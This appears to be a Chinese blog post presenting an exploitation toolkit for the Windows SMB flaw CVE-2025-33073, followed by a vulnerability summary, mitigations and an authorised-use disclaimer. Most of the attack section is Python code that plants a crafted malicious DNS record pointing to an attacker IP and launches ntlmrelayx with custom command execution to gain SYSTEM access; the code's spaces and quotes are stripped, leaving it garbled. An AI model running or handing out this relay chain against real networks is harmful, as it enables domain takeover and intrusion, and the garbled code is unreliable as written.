Windows SMB RCE漏洞CVE-2025-33073分析与利用工具

📅 发布时间:2026/7/6 17:38:45 👁️ 浏览次数:
Windows SMB RCE漏洞CVE-2025-33073分析与利用工具
Windows SMB RCE漏洞CVE-2025-33073分析与利用工具项目描述该项目是一个针对Windows SMB客户端远程代码执行漏洞CVE-2025-33073的安全研究与渗透测试工具集。该漏洞被标记为高危CVSS 8.8分影响Windows 10、11及Server 2012-2025的所有版本允许攻击者在经过身份验证的情况下通过网络实现SYSTEM级别的远程代码执行。工具集包含DNS记录操作和NTLM中继攻击功能用于模拟和测试相关攻击场景。功能特性DNS记录操作通过dnstool.py工具添加恶意DNS记录支持ADIDNS over LDAP交互NTLM中继攻击利用impacket-ntlmrelayx工具发起SMB中继攻击支持自定义命令执行DNS传播监控自动检测DNS记录是否已成功传播支持超时控制多终端支持可在当前终端或新xterm窗口中启动监听器Kerberos集成支持Kerberos身份验证可与LDAP服务交互漏洞利用辅助专门针对CVE-2025-33073漏洞的利用环境搭建安装指南系统要求Python 3.ximpacket库ldap3库dnspython库xterm如需在新窗口中启动监听器依赖安装pipinstallimpacket ldap3 dnspython在Linux/macOS上安装# 克隆相关工具gitclonerepository-urlcdproject-directory# 确保脚本有执行权限chmodx *.py# 安装系统依赖Debian/Ubuntusudoapt-getinstallxtermdig使用说明基础使用示例#!/usr/bin/env python3importshleximportsysimportargparseimportsubprocessimporttime# 静态DNS记录常量STATIC_DNS_RECORDlocalhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAAdefrun_dnstool(user,password,attacker_ip,dns_ip,dc_fqdn): 使用dnstool.py添加恶意DNS记录 print([*] Adding malicious DNS record using dnstool.py...)dnstool_cmd[python3,dnstool.py,-u,user,-p,password,-a,add,-r,STATIC_DNS_RECORD,-d,attacker_ip,-dns-ip,dns_ip,dc_fqdn]subprocess.run(dnstool_cmd,checkTrue)print([] DNS record added.)监控DNS记录传播defwait_for_dns_record(record,dns_ip,timeout60): 等待DNS记录传播并验证 timeoutint(timeout)print(f[*] Waiting for DNS record{record}to propagate...)start_timetime.time()whiletime.time()-start_timetimeout:try:resultsubprocess.run([dig,short,record,f{dns_ip}],capture_outputTrue,textTrue)ifresult.stdout.strip():print([] DNS record is live.)returnTrueexceptExceptionase:print(f[!] Error checking DNS record:{e})time.sleep(2)print([!] Timeout reached. DNS record not found.)returnFalse启动NTLM中继监听器defstart_ntlmrelayx(target,cli_onlyFalse,custom_commandNone,socksFalse): 启动impacket-ntlmrelayx监听器 ifcli_only:print([*] Starting ntlmrelayx listener in this terminal...)ifcustom_command:cmd[impacket-ntlmrelayx,-t,target,-smb2support,-c,custom_command]else:cmd[impacket-ntlmrelayx,-t,target,-smb2support]ifsocks:cmd.append(-socks)returnsubprocess.Popen(cmd)else:print([*] Starting ntlmrelayx listener in a new xterm...)ifcustom_command:cmd[xterm,-hold,-e,impacket-ntlmrelayx,-t,target,-smb2support,-c,custom_command]else:cmd[xterm,-hold,-e,impacket-ntlmrelayx,-t,target,-smb2support]ifsocks:cmd.insert(-1,-socks)returnsubprocess.Popen(cmd)核心代码DNS工具核心功能#!/usr/bin/env python ADIDNS over LDAP交互工具 Copyright (c) 2019 Dirk-jan Mollema (_dirkjan) importsysimportargparseimportgetpassimportreimportosimportsocketfromstructimportunpack,packfromimpacket.structureimportStructurefromimpacket.krb5.ccacheimportCCachefromimpacket.krb5.kerberosv5importgetKerberosTGT,getKerberosTGSfromimpacket.krb5.typesimportPrincipalfromimpacket.krb5importconstantsfromldap3importNTLM,Server,Connection,ALL,LEVEL,BASE,MODIFY_DELETE,MODIFY_ADD,MODIFY_REPLACE,SASL,KERBEROSfromlib.utils.kerberosimportldap_kerberosimportldap3fromimpacket.ldapimportldaptypesimportdns.resolverimportdatetimedefprint_m(string):打印消息sys.stderr.write(\033[94m[-]\033[0m %s\n%(string))defprint_o(string):打印成功信息sys.stderr.write(\033[92m[]\033[0m %s\n%(string))defprint_f(string):打印失败信息sys.stderr.write(\033[91m[!]\033[0m %s\n%(string))漏洞信息结构# ✨ CVE-2025-33073: Windows SMB RCE Vulnerability # High-Severity Authenticated Remote Code Execution # Improper Access Control in Windows SMB Client (CWE-284)# ️ 关键信息概览 CVSS v3.1评分: 8.8 (高危) 受影响系统: Windows 10, 11, Server 2012–2025 (所有版本) 披露日期: 2025年6月10日 (已在2025年6月补丁星期二修复) 攻击向量: 网络 (需身份验证) 影响: SYSTEM级别代码执行通过Kerberos中继进行横向移动 绕过: NTLM反射缓解措施 # ️ 立即缓解措施 1. 立即打补丁! → 应用Microsoft更新 (例如 KB5060998) → Microsoft更新指南: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 2. 启用SMB签名 → 在所有客户端和服务器上强制执行 → 使用命令: Set-SmbClientConfiguration -RequireSecuritySignature $true 3. 限制NTLM使用 → 尽可能阻止NTLM → 使用EDR工具监控中继尝试 4. 为什么这个漏洞重要? - 绕过传统的NTLM保护 - 即使在SMB签名未强制执行的情况下也能工作 - 在配置不当的AD环境中实现完整的域接管 该工具集专门设计用于安全研究人员和渗透测试人员以了解和防御CVE-2025-33073漏洞的相关攻击。请仅在授权测试环境中使用这些工具。FINISHED6HFtX5dABrKlqXeO5PUv/84SoIoTE3firf/5vX8AZ5IUcdbvYYh2wQDLvscF更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享